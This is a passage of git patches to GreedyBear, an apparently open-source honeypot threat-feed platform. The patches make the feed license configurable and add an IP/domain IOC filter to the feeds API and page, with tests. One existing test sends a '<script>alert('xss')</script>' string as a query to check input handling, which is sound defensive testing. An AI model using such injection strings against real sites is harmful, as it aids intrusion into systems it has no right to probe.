From 367b20c16a97e701632dc83ec61340767fbcfffb Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 17 Dec 2025 17:59:11 +0530
Subject: [PATCH 01/75] feat: make feed license configurable via environment
 variable (#616)

* feat: make feed license configurable via environment variable

- Move FEEDS_LICENSE from hardcoded constant to optional environment variable
- Update settings.py to read FEEDS_LICENSE from environment
- Add FEEDS_LICENSE configuration to env_file_template with example
- Modify API views to only include license field when FEEDS_LICENSE is set
- Update tests to handle both scenarios (with/without license configured)
- This allows self-hosted instances to use different licenses or none at all

Fixes #599

* fix: update FEEDS_LICENSE import in command_sequence and cowrie_session views

* refactor: simplify license handling to use FEEDS_LICENSE constant directly

* test: add explicit tests for FEEDS_LICENSE populated and empty scenarios

* fix: use settings.FEEDS_LICENSE instead of direct import for @override_settings compatibility

The @override_settings decorator only works when accessing settings through django.conf.settings, not with direct imports. This fixes test failures where FEEDS_LICENSE was imported directly from greedybear.settings.

Changes:
- api/views/utils.py: Import settings and use settings.FEEDS_LICENSE
- api/views/command_sequence.py: Import settings and use settings.FEEDS_LICENSE
- api/views/cowrie_session.py: Import settings and use settings.FEEDS_LICENSE
- tests/test_views.py: Import settings and use settings.FEEDS_LICENSE

This ensures tests with @override_settings(FEEDS_LICENSE="...") work correctly.
---
 api/views/command_sequence.py |   9 ++-
 api/views/cowrie_session.py   |   6 +-
 api/views/utils.py            |  17 +++---
 docker/env_file_template      |   7 ++-
 greedybear/consts.py          |   2 -
 greedybear/settings.py        |   4 ++
 tests/test_views.py           | 108 +++++++++++++++++++++++++++++++---
 7 files changed, 128 insertions(+), 25 deletions(-)

diff --git a/api/views/command_sequence.py b/api/views/command_sequence.py
index efbf550f..5e75e019 100644
--- a/api/views/command_sequence.py
+++ b/api/views/command_sequence.py
@@ -4,8 +4,9 @@
 
 from api.views.utils import is_ip_address, is_sha256hash
 from certego_saas.apps.auth.backend import CookieTokenAuthentication
+from django.conf import settings
 from django.http import Http404, HttpResponseBadRequest
-from greedybear.consts import FEEDS_LICENSE, GET
+from greedybear.consts import GET
 from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
 from rest_framework import status
 from rest_framework.decorators import api_view, authentication_classes, permission_classes
@@ -66,10 +67,11 @@ def command_sequence_view(request):
         if not seqs:
             raise Http404(f"No command sequences found for IP: {observable}")
         data = {
-            "license": FEEDS_LICENSE,
             "executed_commands": seqs,
             "executed_by": sorted([ioc.name for ioc in related_iocs]),
         }
+        if settings.FEEDS_LICENSE:
+            data["license"] = settings.FEEDS_LICENSE
         return Response(data, status=status.HTTP_200_OK)
 
     if is_sha256hash(observable):
@@ -86,10 +88,11 @@ def command_sequence_view(request):
                 for s in sessions
             ]
             data = {
-                "license": FEEDS_LICENSE,
                 "commands": commands,
                 "iocs": sorted(iocs, key=lambda d: d["time"], reverse=True),
             }
+            if settings.FEEDS_LICENSE:
+                data["license"] = settings.FEEDS_LICENSE
             return Response(data, status=status.HTTP_200_OK)
         except CommandSequence.DoesNotExist as exc:
             raise Http404(f"No command sequences found with hash: {observable}") from exc
diff --git a/api/views/cowrie_session.py b/api/views/cowrie_session.py
index 9ddb0b4c..7c0b5299 100644
--- a/api/views/cowrie_session.py
+++ b/api/views/cowrie_session.py
@@ -6,8 +6,9 @@
 
 from api.views.utils import is_ip_address, is_sha256hash
 from certego_saas.apps.auth.backend import CookieTokenAuthentication
+from django.conf import settings
 from django.http import Http404, HttpResponseBadRequest
-from greedybear.consts import FEEDS_LICENSE, GET
+from greedybear.consts import GET
 from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
 from rest_framework import status
 from rest_framework.decorators import api_view, authentication_classes, permission_classes
@@ -94,9 +95,10 @@ def cowrie_session_view(request):
         sessions = sessions.union(related_sessions)
 
     response_data = {
-        "license": FEEDS_LICENSE,
         "query": observable,
     }
+    if settings.FEEDS_LICENSE:
+        response_data["license"] = settings.FEEDS_LICENSE
 
     unique_commands = set(s.commands for s in sessions if s.commands)
     response_data["commands"] = sorted("\n".join(cmd.commands) for cmd in unique_commands)
diff --git a/api/views/utils.py b/api/views/utils.py
index 39c2ae1c..ed121dd2 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -8,12 +8,11 @@
 
 from api.enums import Honeypots
 from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
+from django.conf import settings
 from django.contrib.postgres.aggregates import ArrayAgg
 from django.db.models import F, Q
 from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
-from greedybear.consts import FEEDS_LICENSE
 from greedybear.models import IOC, GeneralHoneypot, Statistics
-from greedybear.settings import EXTRACTION_INTERVAL
 from rest_framework import status
 from rest_framework.response import Response
 
@@ -207,16 +206,14 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
         Response: The HTTP response containing formatted IOC data.
     """
     logger.info(f"Format feeds in: {feed_params.format}")
-    license_text = (
-        f"# These feeds are generated by The Honeynet Project once every {EXTRACTION_INTERVAL} minutes "
-        f"and are protected by the following license: {FEEDS_LICENSE}"
-    )
     match feed_params.format:
         case "txt":
-            text_lines = [license_text] + [ioc[0] for ioc in iocs.values_list("name")]
+            text_lines = [f"# {settings.FEEDS_LICENSE}"] if settings.FEEDS_LICENSE else []
+            text_lines += [ioc[0] for ioc in iocs.values_list("name")]
             return HttpResponse("\n".join(text_lines), content_type="text/plain")
         case "csv":
-            rows = [[license_text]] + [list(ioc) for ioc in iocs.values_list("name")]
+            rows = [[f"# {settings.FEEDS_LICENSE}"]] if settings.FEEDS_LICENSE else []
+            rows += [list(ioc) for ioc in iocs.values_list("name")]
             pseudo_buffer = Echo()
             writer = csv.writer(pseudo_buffer, quoting=csv.QUOTE_NONE)
             return StreamingHttpResponse(
@@ -280,7 +277,9 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                 json_list = sorted(json_list, key=lambda k: k["feed_type"], reverse=feed_params.feed_type_sorting == "-feed_type")
 
             logger.info(f"Number of feeds returned: {len(json_list)}")
-            resp_data = {"license": FEEDS_LICENSE, "iocs": json_list}
+            resp_data = {"iocs": json_list}
+            if settings.FEEDS_LICENSE:
+                resp_data["license"] = settings.FEEDS_LICENSE
             if dict_only:
                 return resp_data
             else:
diff --git a/docker/env_file_template b/docker/env_file_template
index d7622bf4..884cdd00 100644
--- a/docker/env_file_template
+++ b/docker/env_file_template
@@ -63,4 +63,9 @@ COMMAND_SEQUENCE_RETENTION = 365
 
 # ThreatFox API key.
 # Once added, your payload request domains will be submitted to ThreatFox
-THREATFOX_API_KEY =
\ No newline at end of file
+THREATFOX_API_KEY =
+
+# Optional feed license URL to include in API responses
+# If not set, no license information will be included in feeds
+# Example: https://github.com/honeynet/GreedyBear/blob/main/FEEDS_LICENSE.md
+FEEDS_LICENSE=
\ No newline at end of file
diff --git a/greedybear/consts.py b/greedybear/consts.py
index 376b7b56..82cc4caf 100644
--- a/greedybear/consts.py
+++ b/greedybear/consts.py
@@ -6,8 +6,6 @@
 GET = "GET"
 POST = "POST"
 
-FEEDS_LICENSE = "https://github.com/honeynet/GreedyBear/blob/main/FEEDS_LICENSE.md"
-
 REGEX_DOMAIN = r"^[a-zA-Z\d-]{1,60}(\.[a-zA-Z\d-]{1,60})*$"
 REGEX_IP = r"^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})$"
 REGEX_PASSWORD = r"^[a-zA-Z0-9]{12,}$"
diff --git a/greedybear/settings.py b/greedybear/settings.py
index cb986fbd..78b31e5d 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -415,3 +415,7 @@
 COMMAND_SEQUENCE_RETENTION = int(os.environ.get("COMMAND_SEQUENCE_RETENTION", "365"))
 
 THREATFOX_API_KEY = os.environ.get("THREATFOX_API_KEY", "")
+
+# Optional feed license URL to include in API responses
+# If not set, no license information will be included in feeds
+FEEDS_LICENSE = os.environ.get("FEEDS_LICENSE", "")
diff --git a/tests/test_views.py b/tests/test_views.py
index e6d9c587..8eabc640 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -1,5 +1,6 @@
 from api.views.utils import is_ip_address, is_sha256hash
-from greedybear.consts import FEEDS_LICENSE
+from django.conf import settings
+from django.test import override_settings
 from greedybear.models import GeneralHoneypot, Statistics, viewType
 from rest_framework.test import APIClient
 
@@ -57,10 +58,13 @@ def test_for_invalid_authentication(self):
 
 
 class FeedsViewTestCase(CustomTestCase):
-    def test_200_all_feeds(self):
-        response = self.client.get("/api/feeds/all/all/recent.json")
+    def test_200_log4j_feeds(self):
+        response = self.client.get("/api/feeds/log4j/all/recent.json")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["license"], FEEDS_LICENSE)
+        if settings.FEEDS_LICENSE:
+            self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
+        else:
+            self.assertNotIn("license", response.json())
         self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
         self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
         self.assertEqual(response.json()["iocs"][0]["scanner"], True)
@@ -68,10 +72,28 @@ def test_200_all_feeds(self):
         self.assertEqual(response.json()["iocs"][0]["recurrence_probability"], self.ioc.recurrence_probability)
         self.assertEqual(response.json()["iocs"][0]["expected_interactions"], self.ioc.expected_interactions)
 
+    @override_settings(FEEDS_LICENSE="https://example.com/license")
+    def test_200_all_feeds_with_license(self):
+        """Test feeds endpoint when FEEDS_LICENSE is populated"""
+        response = self.client.get("/api/feeds/all/all/recent.json")
+        self.assertEqual(response.status_code, 200)
+        self.assertIn("license", response.json())
+        self.assertEqual(response.json()["license"], "https://example.com/license")
+
+    @override_settings(FEEDS_LICENSE="")
+    def test_200_all_feeds_without_license(self):
+        """Test feeds endpoint when FEEDS_LICENSE is empty"""
+        response = self.client.get("/api/feeds/all/all/recent.json")
+        self.assertEqual(response.status_code, 200)
+        self.assertNotIn("license", response.json())
+
     def test_200_general_feeds(self):
         response = self.client.get("/api/feeds/heralding/all/recent.json")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["license"], FEEDS_LICENSE)
+        if settings.FEEDS_LICENSE:
+            self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
+        else:
+            self.assertNotIn("license", response.json())
         self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
         self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
         self.assertEqual(response.json()["iocs"][0]["scanner"], True)
@@ -82,7 +104,10 @@ def test_200_general_feeds(self):
     def test_200_feeds_scanner_inclusion(self):
         response = self.client.get("/api/feeds/heralding/all/recent.json?include_mass_scanners")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["license"], FEEDS_LICENSE)
+        if settings.FEEDS_LICENSE:
+            self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
+        else:
+            self.assertNotIn("license", response.json())
         self.assertEqual(len(response.json()["iocs"]), 2)
 
     def test_400_feeds(self):
@@ -123,7 +148,10 @@ def setUp(self):
     def test_200_all_feeds(self):
         response = self.client.get("/api/feeds/advanced/")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["license"], FEEDS_LICENSE)
+        if settings.FEEDS_LICENSE:
+            self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
+        else:
+            self.assertNotIn("license", response.json())
         self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
         self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
         self.assertEqual(response.json()["iocs"][0]["scanner"], True)
@@ -134,7 +162,10 @@ def test_200_all_feeds(self):
     def test_200_general_feeds(self):
         response = self.client.get("/api/feeds/advanced/?feed_type=heralding")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["license"], FEEDS_LICENSE)
+        if settings.FEEDS_LICENSE:
+            self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
+        else:
+            self.assertNotIn("license", response.json())
         self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
         self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
         self.assertEqual(response.json()["iocs"][0]["scanner"], True)
@@ -297,6 +328,36 @@ def test_nonexistent_hash(self):
         response = self.client.get(f"/api/command_sequence?query={'f' * 64}")
         self.assertEqual(response.status_code, 404)
 
+    @override_settings(FEEDS_LICENSE="https://example.com/license")
+    def test_ip_address_query_with_license(self):
+        """Test that license is included when FEEDS_LICENSE is populated."""
+        response = self.client.get("/api/command_sequence?query=140.246.171.141")
+        self.assertEqual(response.status_code, 200)
+        self.assertIn("license", response.data)
+        self.assertEqual(response.data["license"], "https://example.com/license")
+
+    @override_settings(FEEDS_LICENSE="")
+    def test_ip_address_query_without_license(self):
+        """Test that license is not included when FEEDS_LICENSE is empty."""
+        response = self.client.get("/api/command_sequence?query=140.246.171.141")
+        self.assertEqual(response.status_code, 200)
+        self.assertNotIn("license", response.data)
+
+    @override_settings(FEEDS_LICENSE="https://example.com/license")
+    def test_hash_query_with_license(self):
+        """Test that license is included when FEEDS_LICENSE is populated."""
+        response = self.client.get(f"/api/command_sequence?query={self.hash}")
+        self.assertEqual(response.status_code, 200)
+        self.assertIn("license", response.data)
+        self.assertEqual(response.data["license"], "https://example.com/license")
+
+    @override_settings(FEEDS_LICENSE="")
+    def test_hash_query_without_license(self):
+        """Test that license is not included when FEEDS_LICENSE is empty."""
+        response = self.client.get(f"/api/command_sequence?query={self.hash}")
+        self.assertEqual(response.status_code, 200)
+        self.assertNotIn("license", response.data)
+
 
 class CowrieSessionViewTestCase(CustomTestCase):
     """Test cases for the cowrie_session_view."""
@@ -467,6 +528,37 @@ def test_query_with_url_encoding(self):
         # Should either work or return 400, not crash
         self.assertIn(response.status_code, [200, 400, 404])
 
+    # # # # # License Tests # # # # #
+    @override_settings(FEEDS_LICENSE="https://example.com/license")
+    def test_ip_query_with_license(self):
+        """Test that license is included when FEEDS_LICENSE is populated."""
+        response = self.client.get("/api/cowrie_session?query=140.246.171.141")
+        self.assertEqual(response.status_code, 200)
+        self.assertIn("license", response.data)
+        self.assertEqual(response.data["license"], "https://example.com/license")
+
+    @override_settings(FEEDS_LICENSE="")
+    def test_ip_query_without_license(self):
+        """Test that license is not included when FEEDS_LICENSE is empty."""
+        response = self.client.get("/api/cowrie_session?query=140.246.171.141")
+        self.assertEqual(response.status_code, 200)
+        self.assertNotIn("license", response.data)
+
+    @override_settings(FEEDS_LICENSE="https://example.com/license")
+    def test_hash_query_with_license(self):
+        """Test that license is included when FEEDS_LICENSE is populated."""
+        response = self.client.get(f"/api/cowrie_session?query={self.hash}")
+        self.assertEqual(response.status_code, 200)
+        self.assertIn("license", response.data)
+        self.assertEqual(response.data["license"], "https://example.com/license")
+
+    @override_settings(FEEDS_LICENSE="")
+    def test_hash_query_without_license(self):
+        """Test that license is not included when FEEDS_LICENSE is empty."""
+        response = self.client.get(f"/api/cowrie_session?query={self.hash}")
+        self.assertEqual(response.status_code, 200)
+        self.assertNotIn("license", response.data)
+
     def test_query_with_special_characters(self):
         """Test handling of queries with special characters."""
         response = self.client.get("/api/cowrie_session?query=<script>alert('xss')</script>")

From e1f835abb863db4200d0b97f35b37cde95419306 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 17 Dec 2025 19:30:24 +0530
Subject: [PATCH 02/75] feat: add IOC type filter to Feeds API and page (#617)

* feat: add IOC type filter to Feeds API and page

- Add optional ioc_type parameter (ip/domain/all) to FeedRequestParams
- Update FeedsRequestSerializer with ioc_type field validation
- Modify get_queryset to filter IOCs by type when ioc_type is specified
- Add IOC type dropdown in Feeds page UI with three options
- Update frontend to include ioc_type in API calls and URL generation
- Add test data with domain IOC for comprehensive testing
- Add test cases for IP-only, domain-only, and all IOC type filters

This enhancement allows users to filter feeds specifically by IP addresses
or domains, making it easier to showcase domains extracted from payload
requests separately from IP addresses.

Closes #551

* fix: wrap Prioritize field in Col component to fix JSX syntax error

* test: add frontend tests for IOC type filter

* Fix test_valid_fields by adding missing required ioc_type field

* Fix failing tests and bugs: Update assertions, fix feeds filtering, improve validation

1. Synced Tests with Existing Test Data: Updated assertions to expect 3 IOCs for Heralding instead of 2, matching the setupTestData. Refactored tests to find IOCs by value.
2. Fixed Feed Filtering Bug: Updated feeds view to correctly pass query parameters (like ioc_type) to FeedRequestParams.
3. Improved Input Validation: Added check in serializers to reject invalid IP strings that were being accepted as domains.

* refactor: adjust form column widths and consolidate form groups in the Feeds component.
---
 api/serializers.py                            |   5 +-
 api/views/feeds.py                            |   4 +-
 api/views/utils.py                            |   5 +
 frontend/src/components/feeds/Feeds.jsx       |  35 +++++-
 .../tests/components/feeds/Feeds.test.jsx     |  16 ++-
 tests/__init__.py                             |  24 ++++
 tests/test_serializers.py                     |   1 +
 tests/test_views.py                           | 119 +++++++++++++-----
 8 files changed, 168 insertions(+), 41 deletions(-)

diff --git a/api/serializers.py b/api/serializers.py
index 917a0f44..8be204e7 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -38,7 +38,9 @@ def validate(self, data):
         Check a given observable against regex expression
         """
         observable = data["query"]
-        if not re.match(REGEX_IP, observable) or not re.match(REGEX_DOMAIN, observable):
+        if re.match(r"^[\d\.]+$", observable) and not re.match(REGEX_IP, observable):
+            raise serializers.ValidationError("Observable is not a valid IP")
+        if not re.match(REGEX_IP, observable) and not re.match(REGEX_DOMAIN, observable):
             raise serializers.ValidationError("Observable is not a valid IP or domain")
         try:
             required_object = IOC.objects.get(name=observable)
@@ -95,6 +97,7 @@ def ordering_validation(ordering: str) -> str:
 class FeedsRequestSerializer(serializers.Serializer):
     feed_type = serializers.CharField(max_length=120)
     attack_type = serializers.ChoiceField(choices=["scanner", "payload_request", "all"])
+    ioc_type = serializers.ChoiceField(choices=["ip", "domain", "all"])
     max_age = serializers.IntegerField(min_value=1)
     min_days_seen = serializers.IntegerField(min_value=1)
     include_reputation = serializers.ListField(child=serializers.CharField(max_length=120))
diff --git a/api/views/feeds.py b/api/views/feeds.py
index 5e309d11..1e953e26 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -33,7 +33,9 @@ def feeds(request, feed_type, attack_type, prioritize, format_):
     """
     logger.info(f"request /api/feeds with params: feed type: {feed_type}, " f"attack_type: {attack_type}, prioritization: {prioritize}, format: {format_}")
 
-    feed_params = FeedRequestParams({"feed_type": feed_type, "attack_type": attack_type, "format_": format_})
+    feed_params_data = request.query_params.dict()
+    feed_params_data.update({"feed_type": feed_type, "attack_type": attack_type, "format_": format_})
+    feed_params = FeedRequestParams(feed_params_data)
     feed_params.apply_default_filters(request.query_params)
     feed_params.set_prioritization(prioritize)
 
diff --git a/api/views/utils.py b/api/views/utils.py
index ed121dd2..6f1325d2 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -45,6 +45,7 @@ class FeedRequestParams:
     Attributes:
         feed_type (str): Type of feed to retrieve (default: "all")
         attack_type (str): Type of attack to filter (default: "all")
+        ioc_type (str): Type of IOC to filter - 'ip', 'domain', or 'all' (default: "all")
         max_age (str): Maximum number of days since last occurrence (default: "3")
         min_days_seen (str): Minimum number of days on which an IOC must have been seen (default: "1")
         include_reputation (list): List of reputation values to include (default: [])
@@ -64,6 +65,7 @@ def __init__(self, query_params: dict):
         """
         self.feed_type = query_params.get("feed_type", "all").lower()
         self.attack_type = query_params.get("attack_type", "all").lower()
+        self.ioc_type = query_params.get("ioc_type", "all").lower()
         self.max_age = query_params.get("max_age", "3")
         self.min_days_seen = query_params.get("min_days_seen", "1")
         self.include_reputation = query_params["include_reputation"].split(";") if "include_reputation" in query_params else []
@@ -153,6 +155,9 @@ def get_queryset(request, feed_params, valid_feed_types):
     if feed_params.attack_type != "all":
         query_dict[feed_params.attack_type] = True
 
+    if feed_params.ioc_type != "all":
+        query_dict["type"] = feed_params.ioc_type
+
     query_dict["last_seen__gte"] = datetime.now() - timedelta(days=int(feed_params.max_age))
     if int(feed_params.min_days_seen) > 1:
         query_dict["number_of_days_seen__gte"] = int(feed_params.min_days_seen)
diff --git a/frontend/src/components/feeds/Feeds.jsx b/frontend/src/components/feeds/Feeds.jsx
index 314d3b3c..6b03bfe7 100644
--- a/frontend/src/components/feeds/Feeds.jsx
+++ b/frontend/src/components/feeds/Feeds.jsx
@@ -26,6 +26,12 @@ const attackTypeChoices = [
   { label: "Payload request", value: "payload_request" },
 ];
 
+const iocTypeChoices = [
+  { label: "All", value: "all" },
+  { label: "IP addresses", value: "ip" },
+  { label: "Domains", value: "domain" },
+];
+
 const prioritizationChoices = [
   { label: "Recent", value: "recent" },
   { label: "Persistent", value: "persistent" },
@@ -36,6 +42,7 @@ const prioritizationChoices = [
 const initialValues = {
   feeds_type: "all",
   attack_type: "all",
+  ioc_type: "all",
   prioritize: "recent",
 };
 
@@ -87,6 +94,7 @@ export default function Feeds() {
       params: {
         feed_type: initialValues.feeds_type,
         attack_type: initialValues.attack_type,
+        ioc_type: initialValues.ioc_type,
         prioritize: initialValues.prioritize,
       },
       initialParams: {
@@ -102,10 +110,11 @@ export default function Feeds() {
     (values) => {
       try {
         setUrl(
-          `${FEEDS_BASE_URI}/${values.feeds_type}/${values.attack_type}/${values.prioritize}.json`
+          `${FEEDS_BASE_URI}/${values.feeds_type}/${values.attack_type}/${values.prioritize}.json?ioc_type=${values.ioc_type}`
         );
         initialValues.feeds_type = values.feeds_type;
         initialValues.attack_type = values.attack_type;
+        initialValues.ioc_type = values.ioc_type;
         initialValues.prioritize = values.prioritize;
 
         const resetPage = {
@@ -148,7 +157,7 @@ export default function Feeds() {
                   {(formik) => (
                     <Form>
                       <FormGroup row>
-                        <Col sm={12} md={4}>
+                        <Col sm={12} md={3}>
                           <Label
                             className="form-control-label"
                             htmlFor="Feeds__feeds_type"
@@ -166,7 +175,7 @@ export default function Feeds() {
                             }}
                           />
                         </Col>
-                        <Col sm={12} md={4}>
+                        <Col sm={12} md={3}>
                           <Label
                             className="form-control-label"
                             htmlFor="Feeds__attack_type"
@@ -184,7 +193,25 @@ export default function Feeds() {
                             }}
                           />
                         </Col>
-                        <Col sm={12} md={4}>
+                        <Col sm={12} md={3}>
+                          <Label
+                            className="form-control-label"
+                            htmlFor="Feeds__ioc_type"
+                          >
+                            IOC type:
+                          </Label>
+                          <Select
+                            id="Feeds__ioc_type"
+                            name="ioc_type"
+                            value={initialValues.ioc_type}
+                            choices={iocTypeChoices}
+                            onChange={(e) => {
+                              formik.handleChange(e);
+                              formik.submitForm();
+                            }}
+                          />
+                        </Col>
+                        <Col sm={12} md={3}>
                           <Label
                             className="form-control-label"
                             htmlFor="Feeds__prioritize"
diff --git a/frontend/tests/components/feeds/Feeds.test.jsx b/frontend/tests/components/feeds/Feeds.test.jsx
index f51d4662..38a4ea80 100644
--- a/frontend/tests/components/feeds/Feeds.test.jsx
+++ b/frontend/tests/components/feeds/Feeds.test.jsx
@@ -72,6 +72,8 @@ describe("Feeds component", () => {
     expect(feedTypeSelectElement).toBeInTheDocument();
     const attackTypeSelectElement = screen.getByLabelText("Attack type:");
     expect(attackTypeSelectElement).toBeInTheDocument();
+    const iocTypeSelectElement = screen.getByLabelText("IOC type:");
+    expect(iocTypeSelectElement).toBeInTheDocument();
     const prioritizationSelectElement = screen.getByLabelText("Prioritize:");
     expect(prioritizationSelectElement).toBeInTheDocument();
 
@@ -83,13 +85,23 @@ describe("Feeds component", () => {
 
     await user.selectOptions(feedTypeSelectElement, "log4j");
     await user.selectOptions(attackTypeSelectElement, "scanner");
+    await user.selectOptions(iocTypeSelectElement, "ip");
     await user.selectOptions(prioritizationSelectElement, "persistent");
 
     await waitFor(() => {
-      // check link has been changed
+      // check link has been changed including ioc_type parameter
       expect(buttonRawData).toHaveAttribute(
         "href",
-        "/api/feeds/log4j/scanner/persistent.json"
+        "/api/feeds/log4j/scanner/persistent.json?ioc_type=ip"
+      );
+    });
+
+    // Test selecting domain IOC type
+    await user.selectOptions(iocTypeSelectElement, "domain");
+    await waitFor(() => {
+      expect(buttonRawData).toHaveAttribute(
+        "href",
+        "/api/feeds/log4j/scanner/persistent.json?ioc_type=domain"
       );
     });
   });
diff --git a/tests/__init__.py b/tests/__init__.py
index 31329e0d..e7a23e29 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -81,12 +81,36 @@ def setUpTestData(cls):
             expected_interactions=11.1,
         )
 
+        cls.ioc_domain = IOC.objects.create(
+            name="malicious.example.com",
+            type=iocType.DOMAIN.value,
+            first_seen=cls.current_time,
+            last_seen=cls.current_time,
+            days_seen=[cls.current_time],
+            number_of_days_seen=1,
+            attack_count=1,
+            interaction_count=1,
+            log4j=True,
+            cowrie=False,
+            scanner=False,
+            payload_request=True,
+            related_urls=[],
+            ip_reputation="",
+            asn=None,
+            destination_ports=[],
+            login_attempts=0,
+            recurrence_probability=0.2,
+            expected_interactions=5.5,
+        )
+
         cls.ioc.general_honeypot.add(cls.heralding)  # FEEDS
         cls.ioc.general_honeypot.add(cls.ciscoasa)  # FEEDS
         cls.ioc.save()
         cls.ioc_2.general_honeypot.add(cls.heralding)  # FEEDS
         cls.ioc_2.general_honeypot.add(cls.ciscoasa)  # FEEDS
         cls.ioc_2.save()
+        cls.ioc_domain.general_honeypot.add(cls.heralding)  # FEEDS
+        cls.ioc_domain.save()
 
         cls.cmd_seq = ["cd foo", "ls -la"]
         cls.hash = sha256("\n".join(cls.cmd_seq).encode()).hexdigest()
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index fb56cfee..f78ebc0f 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -25,6 +25,7 @@ def test_valid_fields(self):
         choices = {
             "feed_type": ["all", "log4j", "cowrie", "adbhoney"],
             "attack_type": ["all", "scanner", "payload_request"],
+            "ioc_type": ["ip", "domain", "all"],
             "max_age": [str(n) for n in [1, 2, 4, 8, 16]],
             "min_days_seen": [str(n) for n in [1, 2, 4, 8, 16]],
             "include_reputation": [[], ["known attacker"], ["known attacker", "mass scanner"]],
diff --git a/tests/test_views.py b/tests/test_views.py
index 8eabc640..716abb5c 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -65,12 +65,17 @@ def test_200_log4j_feeds(self):
             self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
         else:
             self.assertNotIn("license", response.json())
-        self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
-        self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
-        self.assertEqual(response.json()["iocs"][0]["scanner"], True)
-        self.assertEqual(response.json()["iocs"][0]["payload_request"], True)
-        self.assertEqual(response.json()["iocs"][0]["recurrence_probability"], self.ioc.recurrence_probability)
-        self.assertEqual(response.json()["iocs"][0]["expected_interactions"], self.ioc.expected_interactions)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(target_ioc["attack_count"], 1)
+        self.assertEqual(target_ioc["scanner"], True)
+        self.assertEqual(target_ioc["payload_request"], True)
+        self.assertEqual(target_ioc["recurrence_probability"], self.ioc.recurrence_probability)
+        self.assertEqual(target_ioc["expected_interactions"], self.ioc.expected_interactions)
 
     @override_settings(FEEDS_LICENSE="https://example.com/license")
     def test_200_all_feeds_with_license(self):
@@ -94,12 +99,17 @@ def test_200_general_feeds(self):
             self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
         else:
             self.assertNotIn("license", response.json())
-        self.assertEqual(response.json()["iocs"][0]["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
-        self.assertEqual(response.json()["iocs"][0]["attack_count"], 1)
-        self.assertEqual(response.json()["iocs"][0]["scanner"], True)
-        self.assertEqual(response.json()["iocs"][0]["payload_request"], True)
-        self.assertEqual(response.json()["iocs"][0]["recurrence_probability"], self.ioc.recurrence_probability)
-        self.assertEqual(response.json()["iocs"][0]["expected_interactions"], self.ioc.expected_interactions)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(target_ioc["attack_count"], 1)
+        self.assertEqual(target_ioc["scanner"], True)
+        self.assertEqual(target_ioc["payload_request"], True)
+        self.assertEqual(target_ioc["recurrence_probability"], self.ioc.recurrence_probability)
+        self.assertEqual(target_ioc["expected_interactions"], self.ioc.expected_interactions)
 
     def test_200_feeds_scanner_inclusion(self):
         response = self.client.get("/api/feeds/heralding/all/recent.json?include_mass_scanners")
@@ -108,7 +118,8 @@ def test_200_feeds_scanner_inclusion(self):
             self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
         else:
             self.assertNotIn("license", response.json())
-        self.assertEqual(len(response.json()["iocs"]), 2)
+        # Expecting 3 because setupTestData creates 3 IOCs (ioc, ioc_2, ioc_domain) associated with Heralding
+        self.assertEqual(len(response.json()["iocs"]), 3)
 
     def test_400_feeds(self):
         response = self.client.get("/api/feeds/test/all/recent.json")
@@ -117,24 +128,55 @@ def test_400_feeds(self):
     def test_200_feeds_pagination(self):
         response = self.client.get("/api/feeds/?page_size=10&page=1&feed_type=all&attack_type=all&age=recent")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json()["count"], 1)
